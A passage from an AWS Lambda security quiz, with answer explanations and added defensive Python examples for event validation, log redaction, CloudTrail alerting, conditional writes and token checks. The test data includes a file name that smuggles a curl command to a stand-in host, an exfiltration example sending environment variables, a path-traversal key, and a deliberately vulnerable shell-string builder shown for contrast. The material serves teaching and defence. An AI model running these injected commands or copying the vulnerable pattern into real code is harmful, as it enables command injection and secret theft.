Answer: A) A malicious function could run indefinitely, leading to denial-of-service (DoS) risks
π Explanation: Lambda caps every invocation at its configured timeout (15 minutes at most), so an attacker cannot make a function run indefinitely; but a needlessly long timeout combined with no reserved-concurrency limit lets each triggered invocation occupy an execution environment for minutes, exhausting the account's concurrency and driving up cost (DoS and denial-of-wallet). Keep timeouts tight and set reserved concurrency per function.
150. How can attackers abuse exposed AWS Lambda function URLs?
A) They can trigger unauthorized function executions and exploit vulnerabilities
B) They can reduce function execution latency
C) They can modify the function execution time
D) AWS automatically blocks external access
β
Answer: A) They can trigger unauthorized function executions and exploit vulnerabilities
π Explanation: Exposed Lambda URLs allow attackers to invoke functions, potentially leading to DoS or unauthorized data access.
151. What is a key security concern when using Lambda to process user-generated file uploads?
A) Malicious file uploads leading to remote code execution (RCE)
B) Increased function execution latency
C) Reduced IAM role effectiveness
D) Reduced API Gateway efficiency
β
Answer: A) Malicious file uploads leading to remote code execution (RCE)
π Explanation: Lambda functions handling file uploads should validate and sanitize input to prevent malicious payload execution.
152. What is a common security issue with event-driven Lambda execution?
A) Untrusted events triggering unintended function behaviors
B) Increased AWS billing
C) Reduced function execution time
D) API Gateway latency increases
β
Answer: A) Untrusted events triggering unintended function behaviors
π Explanation: If event sources (e.g., SNS, S3, DynamoDB) are not properly secured, attackers can inject unexpected event payloads.
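Questions 117, 151 and 152 all come down to treating the incoming event as untrusted input. The added example below (not the quiz's code) validates an S3 ObjectCreated notification before the handler touches the object: the record type, the bucket name and its owner, the decoded key (no leading slash, no ".." segments, no path normalisation surprises, an allowed prefix and file type) and a size bound. The bucket name, owner ID, prefix and limits are placeholders, and the sample event is constructed with only the fields the checks read.

```python
"""Validate an S3 event before acting on it.

Added example, not part of the quiz. Names, IDs and limits are placeholders.
"""
import posixpath
from urllib.parse import unquote_plus

EXPECTED_BUCKET = "example-uploads-bucket"    # placeholder
EXPECTED_OWNER = "A1B2C3D4E5F6G7"            # placeholder canonical user id of the bucket owner
ALLOWED_PREFIX = "incoming/"
ALLOWED_SUFFIXES = (".csv", ".json")
MAX_OBJECT_BYTES = 10 * 1024 * 1024


class RejectedEvent(ValueError):
    """Raised when an event fails validation; the handler logs the reason and stops."""


def validated_keys(event: dict) -> list:
    """Return the object keys in `event` that pass every check, or raise RejectedEvent."""
    keys = []
    for record in event.get("Records", []):
        if record.get("eventSource") != "aws:s3" or not str(record.get("eventName", "")).startswith("ObjectCreated:"):
            raise RejectedEvent("not an S3 ObjectCreated record")
        s3 = record.get("s3") or {}
        bucket = s3.get("bucket") or {}
        if bucket.get("name") != EXPECTED_BUCKET:
            raise RejectedEvent(f"unexpected bucket {bucket.get('name')!r}")
        if (bucket.get("ownerIdentity") or {}).get("principalId") != EXPECTED_OWNER:
            raise RejectedEvent("bucket owner mismatch")
        obj = s3.get("object") or {}
        # S3 URL-encodes keys in notifications ('+' for space); decode before any path check.
        key = unquote_plus(str(obj.get("key", "")))
        if not key or key.startswith("/") or ".." in key.split("/") or posixpath.normpath(key) != key:
            raise RejectedEvent(f"suspicious key {key!r}")
        if not key.startswith(ALLOWED_PREFIX) or not key.endswith(ALLOWED_SUFFIXES):
            raise RejectedEvent(f"key outside allowed prefix/suffix {key!r}")
        size = obj.get("size")
        if not isinstance(size, int) or size <= 0 or size > MAX_OBJECT_BYTES:
            raise RejectedEvent(f"unacceptable object size {size!r}")
        keys.append(key)
    if not keys:
        raise RejectedEvent("event carried no records")
    return keys


def make_event(key: str, bucket: str = EXPECTED_BUCKET, owner: str = EXPECTED_OWNER, size: int = 2048) -> dict:
    """Constructed S3 ObjectCreated notification containing only the fields the checks read."""
    return {"Records": [{
        "eventSource": "aws:s3", "eventName": "ObjectCreated:Put",
        "s3": {"bucket": {"name": bucket, "ownerIdentity": {"principalId": owner}},
               "object": {"key": key, "size": size}},
    }]}


def handler(event, context=None):
    keys = validated_keys(event)     # raises before any S3 call on a tampered event
    # Fetch and process each key here; never log the raw event or the object contents.
    return {"processed": keys}
```

Pair the in-code checks with the function's resource policy (only the expected bucket may invoke it) so that a forged event has to get past both the invoke permission and the validation.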
153. What should be avoided when logging errors in AWS Lambda?
A) Logging sensitive data such as API keys, passwords, or PII
B) Using structured logging for debugging
C) Implementing log retention policies
D) Enabling CloudWatch Logs
β
Answer: A) Logging sensitive data such as API keys, passwords, or PII
π Explanation: Sensitive data should never be included in logs, as it can be exposed to unauthorized users.
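Questions 81, 88, 125 and 153 say what not to log; the added example below (not the quiz's code) shows how to enforce that mechanically, with a logging.Filter that masks values of sensitive field names in structured (dict) log records and bearer tokens or AWS access-key-shaped strings in free-text messages, so a handler that logs the whole incoming event does not ship credentials to CloudWatch. The key list, patterns and sample event are made up; extend them to match your own payloads.

```python
"""Redact secrets before they reach CloudWatch Logs.

Added example, not the quiz's code. Key names and samples are placeholders.
"""
import json
import logging
import re

SENSITIVE_KEYS = {"password", "api_key", "apikey", "secret", "authorization",
                  "token", "x-api-key", "ssn"}
PATTERNS = [
    re.compile(r"(?i)bearer\s+[a-z0-9\-._~+/]+=*"),   # bearer tokens in free text
    re.compile(r"AKIA[0-9A-Z]{16}"),                   # shape of an AWS access key id
]


def redact(value):
    """Recursively mask sensitive keys in dicts/lists and token-like substrings in strings."""
    if isinstance(value, dict):
        return {k: ("***" if str(k).lower() in SENSITIVE_KEYS else redact(v)) for k, v in value.items()}
    if isinstance(value, list):
        return [redact(v) for v in value]
    if isinstance(value, str):
        for pattern in PATTERNS:
            value = pattern.sub("***", value)
        return value
    return value


class RedactingFilter(logging.Filter):
    """Rewrites each record's message and arguments before any handler formats them."""

    def filter(self, record: logging.LogRecord) -> bool:
        if isinstance(record.msg, (dict, list)):
            record.msg = json.dumps(redact(record.msg))
        else:
            record.msg = redact(str(record.msg))
            if isinstance(record.args, dict):
                record.args = redact(record.args)
            elif record.args:
                record.args = tuple(redact(a) for a in record.args)
        return True


def get_logger(name: str = "handler") -> logging.Logger:
    logger = logging.getLogger(name)
    if not any(isinstance(f, RedactingFilter) for f in logger.filters):
        logger.addFilter(RedactingFilter())
    return logger


def handler(event, context=None):
    log = get_logger()
    # Logging the event is common during debugging; the filter masks what must not appear.
    log.info({"msg": "request received", "event": event})
    return {"statusCode": 200}
```

The filter is attached to the logger rather than a handler so it applies before the record propagates to the handler the Lambda runtime installs on the root logger. It is a safety net, not a substitute for not logging secrets in the first place, since any field name or token format it does not know about goes through untouched.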
154. How can AWS Lambda environment variables be secured?
A) Encrypt them using AWS KMS before storing
B) Store secrets as plaintext inside function code
C) Allow all AWS accounts to access environment variables
D) Disable encryption for faster execution
β
Answer: A) Encrypt them using AWS KMS before storing
π Explanation: Lambda always encrypts environment variables at rest with KMS (an AWS managed key by default). Use a customer managed key and, for secret values, client-side encryption (the console's encryption helpers or your own kms:Encrypt call) so that the plaintext is not returned by lambda:GetFunctionConfiguration; then decrypt inside the function with kms:Decrypt scoped to that key. Better still, keep secrets out of environment variables entirely and fetch them from Secrets Manager or Parameter Store at runtime.
155. Why is it important to monitor Lambda function invocation patterns?
A) To detect unusual spikes that may indicate an attack (e.g., DoS, brute-force, or privilege escalation attempts)
B) To improve function execution speed
C) To increase AWS billing efficiency
D) To reduce function cold starts
β
Answer: A) To detect unusual spikes that may indicate an attack (e.g., DoS, brute-force, or privilege escalation attempts)
π Explanation: Monitoring execution patterns helps identify security threats, unauthorized access, or misconfigurations.
156. What risk arises from allowing AWS Lambda functions to access unrestricted outbound network connections?
A) Data exfiltration by compromised functions
B) Reduced function execution time
C) Increased IAM security
D) AWS automatically blocks outbound traffic
β
Answer: A) Data exfiltration by compromised functions
π Explanation: A function that is not attached to a VPC has unrestricted internet egress by default, so once an attacker controls its code (through an injection flaw or a malicious dependency) anything the execution role can read can be sent to a host of their choosing. Attach the function to a VPC whose egress is limited to the destinations it needs, and give it no internet route unless it truly requires one.
157. How can API Gateway protect AWS Lambda functions from brute-force attacks?
A) Enable rate limiting and request throttling
B) Allow all API requests without validation
C) Increase API Gateway execution timeout
D) Reduce function concurrency
β
Answer: A) Enable rate limiting and request throttling
π Explanation: Rate limiting prevents attackers from repeatedly invoking functions to guess credentials or overwhelm resources.
158. Why should AWS Lambda IAM roles avoid using * in permission policies?
A) It grants excessive permissions, increasing security risks
B) It speeds up function execution
C) It reduces AWS billing costs
D) It improves API response times
β
Answer: A) It grants excessive permissions, increasing security risks
π Explanation: Wildcard (*) permissions can expose functions to privilege escalation and unauthorized access.
159. What is the impact of insecure cross-account Lambda access?
A) Other AWS accounts can invoke functions without proper authorization
B) AWS automatically restricts all cross-account access
C) It reduces function execution speed
D) It improves API Gateway efficiency
β
Answer: A) Other AWS accounts can invoke functions without proper authorization
π Explanation: Cross-account access is granted through the function's resource-based policy (lambda:AddPermission). Restrict the Principal to specific account IDs or role ARNs, never *, and add SourceArn/SourceAccount conditions when an AWS service is the caller, so a third party cannot use the confused-deputy pattern to have that service invoke your function.
160. What is the best way to secure API Gateway endpoints connected to Lambda?
A) Use authentication mechanisms like IAM, JWT, OAuth, or API keys
B) Allow all users to access the API publicly
C) Store authentication data inside Lambda logs
D) Disable all security features for faster execution
β
Answer: A) Use authentication mechanisms like IAM, JWT, OAuth, or API keys
π Explanation: API Gateway should enforce authentication to prevent unauthorized Lambda invocations.
161. What is the primary risk of using an AWS Lambda function with an overly permissive execution role?
A) The function could be exploited to access or modify unauthorized AWS resources
B) AWS automatically blocks excessive permissions
C) It increases Lambda cold start time
D) It improves function execution speed
β
Answer: A) The function could be exploited to access or modify unauthorized AWS resources
π Explanation: Overly permissive IAM roles can be exploited by attackers to escalate privileges or access unauthorized AWS services.
162. What should you do to prevent event injection attacks in AWS Lambda?
A) Validate and sanitize all incoming event data
B) Allow unrestricted API Gateway triggers
C) Store events in plaintext logs
D) Enable debug mode for Lambda
β
Answer: A) Validate and sanitize all incoming event data
π Explanation: Without proper validation, attackers can manipulate event triggers (e.g., SNS, S3, API Gateway) to inject malicious payloads.
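An added example (not code from the original page) of the validation Q151, Q152 and Q162 call for: a Lambda handler that checks every S3 event record before acting on it, and builds the command for an external converter as an argv list instead of a shell string. The bucket name, prefix, file types, size cap and the use of ImageMagick's convert are assumptions for the demo; the event records are constructed.

```python
import json
import posixpath
import subprocess
import urllib.parse

# Assumptions for this example: the function should only ever process objects
# landing in one bucket/prefix, of a few file types, below a size cap.
EXPECTED_BUCKET = "uploads-prod"
EXPECTED_PREFIX = "incoming/"
ALLOWED_SUFFIXES = (".png", ".jpg", ".jpeg", ".pdf")
MAX_OBJECT_BYTES = 25 * 1024 * 1024
SHELL_METACHARS = set(";|&$`\\\"'<>\n\r\x00")


class RejectedEvent(Exception):
    """Raised for any record that fails validation; the caller drops it and logs why."""


def validate_s3_record(record: dict) -> tuple:
    """Return (bucket, key, size) for one S3 event record or raise RejectedEvent.

    Structure checks run first so a malformed or spoofed record never reaches the
    business logic; then the key is decoded and checked for traversal and shell
    metacharacters; then type and size limits apply.
    """
    try:
        if record["eventSource"] != "aws:s3" or not record["eventName"].startswith("ObjectCreated:"):
            raise RejectedEvent("not an S3 ObjectCreated event")
        bucket = record["s3"]["bucket"]["name"]
        raw_key = record["s3"]["object"]["key"]
        size = int(record["s3"]["object"]["size"])
    except (KeyError, TypeError, ValueError) as exc:
        raise RejectedEvent(f"malformed record: {exc!r}") from exc
    if bucket != EXPECTED_BUCKET:
        raise RejectedEvent(f"unexpected bucket {bucket!r}")
    # S3 URL-encodes keys in notifications (space becomes '+'); decode before checking.
    key = urllib.parse.unquote_plus(raw_key)
    parts = key.split("/")
    if not key.startswith(EXPECTED_PREFIX) or any(p in ("", ".", "..") for p in parts):
        raise RejectedEvent(f"path traversal or wrong prefix in key {key!r}")
    if SHELL_METACHARS.intersection(key):
        raise RejectedEvent(f"shell metacharacters in key {key!r}")
    if not key.lower().endswith(ALLOWED_SUFFIXES):
        raise RejectedEvent(f"disallowed file type {key!r}")
    if size <= 0 or size > MAX_OBJECT_BYTES:
        raise RejectedEvent(f"object size {size} out of range")
    return bucket, key, size


def build_convert_command_unsafe(key: str) -> str:
    """VULNERABLE variant, kept only for contrast: the key is spliced into a shell
    command line, so a key like 'incoming/x.png; curl evil.example/$(env)' would
    run the attacker's command if this string were passed to a shell."""
    return f"convert /tmp/{key} /tmp/out.png"


def build_convert_command(key: str) -> list:
    """Hardened variant: an argv list (no shell involved) and a path that is always
    absolute under /tmp, so it can never be parsed as a tool option."""
    return ["convert", "/tmp/" + posixpath.basename(key), "/tmp/out.png"]


def run_convert(argv: list) -> subprocess.CompletedProcess:
    """Run the converter with no shell and a hard timeout (not executed in the demo)."""
    return subprocess.run(argv, check=True, capture_output=True, timeout=30)


def handler(event: dict, context=None) -> dict:
    """Lambda entry point: validate every record, build a safe command for the good ones."""
    accepted, rejected = [], []
    for record in event.get("Records", []):
        try:
            bucket, key, size = validate_s3_record(record)
        except RejectedEvent as exc:
            rejected.append(str(exc))
            continue
        accepted.append({"bucket": bucket, "key": key, "size": size,
                         "argv": build_convert_command(key)})
    return {"accepted": accepted, "rejected": rejected}


def _s3_record(bucket: str, key: str, size: int) -> dict:
    """Constructed S3 notification record with only the fields the handler reads."""
    return {"eventSource": "aws:s3", "eventName": "ObjectCreated:Put",
            "s3": {"bucket": {"name": bucket}, "object": {"key": key, "size": size}}}


# Constructed event: one legitimate upload and three hostile records.
SAMPLE_EVENT = {"Records": [
    _s3_record("uploads-prod", "incoming/report+2024.pdf", 10240),
    _s3_record("uploads-prod", "incoming/..%2F..%2Fetc%2Fpasswd", 1),
    _s3_record("uploads-prod", "incoming/shot.png%3B+curl+evil.example%2Fx", 1),
    _s3_record("attacker-bucket", "incoming/x.png", 1),
]}

if __name__ == "__main__":
    print(json.dumps(handler(SAMPLE_EVENT), indent=2))
```

Two details matter in practice: the key must be URL-decoded before any check (otherwise an encoded ../ slips past), and the hardened command never needs to know what the key contains because no shell ever interprets it.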
163. How can AWS Lambda functions be protected against DDoS attacks?
A) Use AWS Shield and API Gateway rate limiting
B) Disable IAM authentication
C) Increase Lambda execution timeout
D) Allow unlimited public API access
β
Answer: A) Use AWS Shield and API Gateway rate limiting
π Explanation: AWS Shield (Standard is automatic at the edge; Advanced adds larger-scale mitigation and cost protection) absorbs volumetric floods, API Gateway throttling caps request rates per stage or per API key, and a reserved-concurrency limit on the function bounds how many executions a flood can consume.
164. What is the best way to handle AWS Lambda function failures securely?
A) Use Dead Letter Queues (DLQs) to capture failed event messages
B) Store failed event data in plaintext logs
C) Increase function execution timeout
D) Disable logging for failed events
β
Answer: A) Use Dead Letter Queues (DLQs) to capture failed event messages
π Explanation: A dead-letter queue (or an on-failure destination) captures events that still fail after Lambda's asynchronous retries, so they can be inspected and replayed instead of being lost or retried forever. The captured payloads are often sensitive, so encrypt the queue and restrict who can read it.
165. How can AWS Lambda functions be protected from privilege escalation attacks?
A) Follow the principle of least privilege for IAM roles
B) Use wildcard (*) permissions in IAM policies
C) Allow all AWS accounts to assume the execution role
D) Store AWS credentials in function logs
β
Answer: A) Follow the principle of least privilege for IAM roles
π Explanation: Overly permissive IAM roles increase the risk of privilege escalation, where attackers gain unauthorized access to AWS services.
166. What is a security concern of using third-party libraries in AWS Lambda functions?
A) They may contain known vulnerabilities that attackers can exploit
B) They reduce function execution speed
C) They increase AWS billing
D) They automatically improve security
β
Answer: A) They may contain known vulnerabilities that attackers can exploit
π Explanation: Unverified third-party libraries can introduce vulnerabilities, leading to remote code execution or data breaches.
167. Why should AWS Lambda logging be restricted to authorized users?
A) Logs may contain sensitive data that could be accessed by attackers
B) It improves function execution time
C) It reduces AWS costs
D) It increases function concurrency
β
Answer: A) Logs may contain sensitive data that could be accessed by attackers
π Explanation: Unrestricted access to logs can expose secrets, API keys, or error messages that attackers can use for further exploitation.
168. How can IAM role assumption be abused in AWS Lambda security?
A) If a Lambda function assumes a highly privileged role, it may gain excessive permissions
B) It decreases Lambda function execution time
C) It increases function cold starts
D) It reduces AWS logging efficiency
β
Answer: A) If a Lambda function assumes a highly privileged role, it may gain excessive permissions
π Explanation: A function can call sts:AssumeRole on any role whose trust policy accepts its execution role. If that trust policy is broad (for example trusting the whole account) or the execution role is allowed to assume an administrative role, an attacker who compromises the function inherits those privileges. Keep trust policies specific to the one role that needs them and scope the function's sts:AssumeRole permission to exact role ARNs.
169. How can AWS CloudTrail improve AWS Lambda security?
A) By tracking API calls and detecting unauthorized access attempts
B) By reducing Lambda cold starts
C) By increasing Lambda execution speed
D) By automatically blocking insecure IAM policies
β
Answer: A) By tracking API calls and detecting unauthorized access attempts
π Explanation: AWS CloudTrail logs API calls, helping to detect security incidents like unauthorized function modifications.
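An added example (not code from the original page) of the detection Q155 and Q169 describe, run over constructed CloudTrail-shaped records: it flags the Lambda API calls that most often mark a compromise or a dangerous misconfiguration (opening invoke permission to *, creating a function URL with no auth, changing the execution role, shipping code from outside the deployment pipeline) and a burst of AccessDenied errors from one principal. The deploy-role ARN, account ID and record layout are assumptions; real CloudTrail records carry many more fields.

```python
from collections import Counter

# Assumption: the only identity that should ship code is the CI pipeline's role.
DEPLOY_ROLES = {"arn:aws:sts::111122223333:assumed-role/DeployRole/ci"}
DENIED_THRESHOLD = 5  # AccessDenied events from one principal before we call it enumeration


def detect(records, deploy_roles=DEPLOY_ROLES, denied_threshold=DENIED_THRESHOLD):
    """Scan CloudTrail records for Lambda changes worth an alert.

    Returns one finding dict per hit. Event names are matched by prefix because
    Lambda's CloudTrail names carry API-version suffixes (e.g. AddPermission20150331v2).
    """
    findings = []
    denied = Counter()
    for rec in records:
        if rec.get("eventSource") != "lambda.amazonaws.com":
            continue
        name = rec.get("eventName", "")
        params = rec.get("requestParameters") or {}
        actor = rec.get("userIdentity", {}).get("arn", "unknown")
        fn = params.get("functionName")

        if rec.get("errorCode") == "AccessDenied":
            denied[actor] += 1  # counted here, reported once below
            continue
        if (name.startswith("AddPermission") and params.get("principal") == "*"
                and not params.get("sourceArn") and not params.get("sourceAccount")):
            findings.append({"rule": "public-invoke-permission", "actor": actor, "function": fn})
        elif (name.startswith(("CreateFunctionUrlConfig", "UpdateFunctionUrlConfig"))
                and params.get("authType") == "NONE"):
            findings.append({"rule": "public-function-url", "actor": actor, "function": fn})
        elif name.startswith("UpdateFunctionCode") and actor not in deploy_roles:
            findings.append({"rule": "code-change-outside-pipeline", "actor": actor, "function": fn})
        elif name.startswith("UpdateFunctionConfiguration") and "role" in params:
            findings.append({"rule": "execution-role-changed", "actor": actor,
                             "function": fn, "new_role": params["role"]})
    for actor, count in denied.items():
        if count >= denied_threshold:
            findings.append({"rule": "access-denied-burst", "actor": actor, "count": count})
    return findings


def _event(name, actor, params=None, error=None):
    """Build a CloudTrail-shaped record (constructed; only the fields detect() reads)."""
    rec = {"eventSource": "lambda.amazonaws.com", "eventName": name,
           "userIdentity": {"arn": actor}, "requestParameters": params or {}}
    if error:
        rec["errorCode"] = error
    return rec


CI = "arn:aws:sts::111122223333:assumed-role/DeployRole/ci"
ALICE = "arn:aws:iam::111122223333:user/alice"
BOB = "arn:aws:iam::111122223333:user/bob"

# Constructed trail: a normal deploy, then four risky changes by a human user and
# six denied calls from another principal poking at the account.
SAMPLE_TRAIL = [
    _event("UpdateFunctionCode20150331v2", CI, {"functionName": "upload-processor"}),
    _event("UpdateFunctionCode20150331v2", ALICE, {"functionName": "upload-processor"}),
    _event("AddPermission20150331v2", ALICE, {"functionName": "upload-processor",
           "action": "lambda:InvokeFunction", "principal": "*", "statementId": "open"}),
    _event("CreateFunctionUrlConfig", ALICE, {"functionName": "upload-processor", "authType": "NONE"}),
    _event("UpdateFunctionConfiguration20150331v2", ALICE,
           {"functionName": "upload-processor", "role": "arn:aws:iam::111122223333:role/AdminRole"}),
] + [_event("ListFunctions20150331", BOB, error="AccessDenied") for _ in range(6)]

if __name__ == "__main__":
    for finding in detect(SAMPLE_TRAIL):
        print(finding)
```

In production the same rules run as EventBridge rules on the CloudTrail event stream or as a scheduled query over the trail in S3/Athena; the logic is the same, the plumbing differs.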
170. What is a key risk of using publicly available AWS Lambda Layers?
A) They could contain malicious code that executes within your Lambda function
B) They increase Lambda execution speed
C) AWS automatically verifies public layers for security
D) They improve API Gateway latency
β
Answer: A) They could contain malicious code that executes within your Lambda function
π Explanation: Anyone can publish a layer and share it publicly, and its contents run inside your function with your execution role. Pin to a specific layer version ARN from a publisher you trust, inspect what the layer contains, and prefer layers you build yourself from dependencies you have scanned.
171. What is a potential impact of storing API keys in Lambda environment variables without encryption?
A) An attacker who gains access to the function can extract the API keys
B) It improves function execution speed
C) It reduces AWS costs
D) AWS automatically encrypts all environment variables
β
Answer: A) An attacker who gains access to the function can extract the API keys
π Explanation: Lambda does encrypt environment variables at rest, but their plaintext is still returned to anyone with lambda:GetFunctionConfiguration and is visible to any code running inside the function, including a compromised dependency. Encrypt secret values with a customer managed KMS key before storing them, or fetch them from Secrets Manager at runtime, so that reading the configuration alone yields nothing usable.
172. How can AWS Lambda functions be protected from race conditions?
A) Use DynamoDB conditional writes or distributed locking mechanisms
B) Allow all concurrent executions
C) Increase function timeout settings
D) Enable verbose logging
β
Answer: A) Use DynamoDB conditional writes or distributed locking mechanisms
π Explanation: Concurrent invocations that read, decide and then write can all act on the same stale value (a double spend, a coupon redeemed twice, a duplicate delivery processed twice). A DynamoDB conditional write makes the check and the write one atomic operation, so exactly one of the racing writers succeeds and the others receive ConditionalCheckFailedException and back off; a distributed lock achieves the same serialisation at higher cost.
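An added example (not code from the original page) of the conditional-write pattern from Q172. The in-memory table is a constructed stand-in for DynamoDB so the demo runs offline: its two methods carry the semantics of put_item with ConditionExpression="attribute_not_exists(pk)" and of UpdateItem with a "balance >= :amount" condition, which DynamoDB evaluates atomically server-side. The event and account identifiers are assumptions.

```python
import threading
import time


class ConditionalCheckFailed(Exception):
    """Stand-in for botocore's ConditionalCheckFailedException."""


class InMemoryTable:
    """Constructed stand-in for a DynamoDB table; the lock plays the role of the
    atomicity DynamoDB provides for a single conditional write."""

    def __init__(self):
        self._items = {}
        self._lock = threading.Lock()

    def put_if_absent(self, item: dict) -> None:
        # boto3 equivalent (not executed here):
        #   table.put_item(Item=item, ConditionExpression="attribute_not_exists(pk)")
        with self._lock:
            if item["pk"] in self._items:
                raise ConditionalCheckFailed(item["pk"])
            self._items[item["pk"]] = dict(item)

    def decrement_if_at_least(self, pk: str, attr: str, amount: int) -> bool:
        # boto3 equivalent (not executed here):
        #   table.update_item(Key={"pk": pk},
        #       UpdateExpression=f"SET {attr} = {attr} - :a",
        #       ConditionExpression=f"{attr} >= :a",
        #       ExpressionAttributeValues={":a": amount})
        with self._lock:
            item = self._items.get(pk)
            if item is None or item.get(attr, 0) < amount:
                return False
            item[attr] -= amount
            return True

    def get(self, pk: str):
        return self._items.get(pk)


def process_once(table: InMemoryTable, event_id: str, work, ttl_seconds: int = 86400) -> bool:
    """Run work(event_id) at most once per event_id across concurrent invocations.

    The claim is written BEFORE the side effect. If it fails, another invocation
    (a duplicate delivery, a retry, or an attacker replaying the event) already
    owns this event and the effect must not be repeated. expires_at lets a
    DynamoDB TTL garbage-collect old claims.
    """
    claim = {"pk": f"event#{event_id}", "expires_at": int(time.time()) + ttl_seconds}
    try:
        table.put_if_absent(claim)
    except ConditionalCheckFailed:
        return False
    work(event_id)
    return True


def _run_concurrently(n: int, fn) -> list:
    """Invoke fn(i) on n threads at once and return the results in order."""
    results = [None] * n

    def invoke(i):
        results[i] = fn(i)

    threads = [threading.Thread(target=invoke, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def simulate_duplicate_delivery(copies: int = 8) -> dict:
    """Deliver the same event `copies` times concurrently; only one may act on it."""
    table = InMemoryTable()
    ran, ran_lock = [], threading.Lock()

    def work(event_id):
        with ran_lock:
            ran.append(event_id)

    results = _run_concurrently(copies, lambda i: process_once(table, "order-123-paid", work))
    return {"delivered": copies, "claimed": sum(results), "side_effects": len(ran)}


def simulate_double_spend(balance: int = 100, attempts: int = 10, amount: int = 30) -> dict:
    """Race `attempts` debits against one balance; the conditional update
    guarantees the balance never goes negative however the threads interleave."""
    table = InMemoryTable()
    table.put_if_absent({"pk": "account#42", "balance": balance})
    results = _run_concurrently(
        attempts, lambda i: table.decrement_if_at_least("account#42", "balance", amount))
    return {"attempted": attempts, "succeeded": sum(results),
            "balance": table.get("account#42")["balance"]}


if __name__ == "__main__":
    print(simulate_duplicate_delivery())
    print(simulate_double_spend())
```

The naive alternative (get_item, compare in Python, put_item) has a window between the read and the write in which every concurrent invocation sees the old value; moving the comparison into the ConditionExpression closes that window without a separate lock table.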
173. What is the impact of using wildcard (*) permissions in an AWS Lambda function IAM role?
A) It grants excessive permissions, increasing security risks
B) It improves function execution speed
C) It reduces AWS billing costs
D) It automatically secures the Lambda function
β
Answer: A) It grants excessive permissions, increasing security risks
π Explanation: Using * in IAM policies allows Lambda functions to access more resources than required, violating the least privilege principle.
174. How can AWS Lambda functions be protected from misconfigured API Gateway permissions?
A) Use IAM authentication or JWT tokens to restrict API Gateway access
B) Allow all API requests without validation
C) Store authentication details in function logs
D) Disable API Gateway logging
β
Answer: A) Use IAM authentication or JWT tokens to restrict API Gateway access
π Explanation: API Gateway should enforce authentication mechanisms to prevent unauthorized Lambda function invocations.
175. How does AWS WAF help protect AWS Lambda when integrated with API Gateway?
A) It filters out malicious traffic, including SQL injection and XSS attacks
B) It increases function concurrency
C) It reduces Lambda cold starts
D) It disables unauthorized function invocations
β
Answer: A) It filters out malicious traffic, including SQL injection and XSS attacks
π Explanation: AWS WAF inspects API Gateway traffic and blocks malicious requests before they reach Lambda functions.
176. What security risk does an unsecured VPC endpoint for Lambda introduce?
A) It allows external attackers to send unauthorized requests to AWS services
B) It improves function execution speed
C) It increases AWS billing
D) AWS automatically blocks external VPC access
β
Answer: A) It allows external attackers to send unauthorized requests to AWS services
π Explanation: VPC endpoints are not reachable from the internet; the risk is a wide-open endpoint policy (Principal * and Resource *) that lets anything inside the VPC, including a compromised function, reach any bucket, queue or API in any AWS account over a path that never leaves the AWS network and bypasses the NAT or egress firewall. Scope the endpoint policy to your own resources and accounts (for example with aws:PrincipalOrgID or aws:ResourceAccount conditions) so the endpoint cannot be used as an exfiltration channel.
177. What is the primary risk of an AWS Lambda function having public execution permissions?
A) Anyone can invoke the function, leading to API abuse or data leakage
B) It reduces function execution time
C) AWS automatically restricts public access
D) It increases API Gateway request speed
β
Answer: A) Anyone can invoke the function, leading to API abuse or data leakage
π Explanation: "Public" here means a resource-based policy that grants lambda:InvokeFunction (or lambda:InvokeFunctionUrl) to the * principal, or a function URL with auth type NONE. Either lets any internet user run the function on compute you pay for and reach whatever the execution role can reach. Grant invoke permission only to specific principals or services (with SourceArn conditions), and put user-facing functions behind an authenticated API Gateway route.
178. How can AWS Lambda functions be protected from unauthorized API Gateway calls?
A) Implement IAM authentication, API keys, or JWT-based authorization
B) Store access credentials in function logs
C) Allow unrestricted API calls for flexibility
D) Disable API Gateway logging
β
Answer: A) Implement IAM authentication, API keys, or JWT-based authorization
π Explanation: Restricting API Gateway access prevents attackers from invoking Lambda functions without authorization.
179. What risk does unfiltered user input pose to AWS Lambda security?
A) It can lead to injection attacks such as SQLi or command injection
B) It improves function execution time
C) It allows users to execute Lambda functions faster
D) AWS automatically filters all input data
β
Answer: A) It can lead to injection attacks such as SQLi or command injection
π Explanation: Unvalidated user input can be exploited to inject malicious commands, potentially compromising function execution.
180. What is the best approach for handling expired authentication tokens in AWS Lambda?
A) Reject expired tokens and prompt users to re-authenticate
B) Allow expired tokens for a grace period
C) Store expired tokens in function logs
D) Increase token expiration time indefinitely
β
Answer: A) Reject expired tokens and prompt users to re-authenticate
π Explanation: Allowing expired tokens increases security risks; always enforce re-authentication for expired tokens.
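An added example (not code from the original page) of the token handling in Q180 and the JWT-based authorization mentioned in Q160, Q174 and Q178: an API Gateway HTTP API Lambda authorizer (simple response format) that verifies an HS256 token with the standard library and rejects expired, forged or mis-scoped tokens. The shared secret, audience and claim names are assumptions; sign_hs256 exists only to build test inputs, and a real deployment would load the key from Secrets Manager or verify RS256 against the issuer's JWKS.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Assumption for the demo: a shared HS256 key. Load it from Secrets Manager at
# cold start in a real function; never hard-code it.
SECRET = b"demo-only-shared-secret-change-me"
AUDIENCE = "upload-api"


class TokenError(Exception):
    """Any reason a token must be rejected; the message is safe to log."""


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint a token; used here only to build inputs for the verifier."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signature = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(signature)}"


def verify_hs256(token: str, secret: bytes, audience: str,
                 now: Optional[float] = None, leeway: int = 0) -> dict:
    """Return the claims of a valid token or raise TokenError.

    The signature is checked with OUR fixed algorithm before any claim is
    trusted, so the token's alg header cannot downgrade us to 'none' or to a
    different scheme. Expiry allows at most `leeway` seconds of clock skew;
    expired tokens are rejected, never silently extended.
    """
    now = time.time() if now is None else now
    try:
        header_b64, payload_b64, signature_b64 = token.split(".")
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(signature_b64)):
            raise TokenError("bad signature")
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
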